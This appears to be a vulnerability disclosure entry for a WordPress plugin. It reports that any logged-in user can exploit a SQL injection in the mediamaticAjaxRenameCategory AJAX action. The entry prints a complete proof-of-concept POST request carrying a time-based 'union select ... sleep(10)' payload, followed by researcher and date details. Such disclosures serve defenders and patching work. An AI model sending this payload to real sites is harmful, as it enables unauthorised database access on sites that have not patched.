The mediamaticAjaxRenameCategory AJAX action of the plugin, available to any authenticated user, does not sanitise the categoryID parameter before using it in a SQL statement, leading to an SQL injection
POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: [any authenticated user] Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 77 action=mediamaticAjaxRenameCategory&categoryID=1+union+select+1+and+sleep(10)
JrXnm
JrXnm
Yes
2021-11-15 (about 7 months ago)
2021-11-15 (about 7 months ago)
2022-04-08 (about 3 months ago)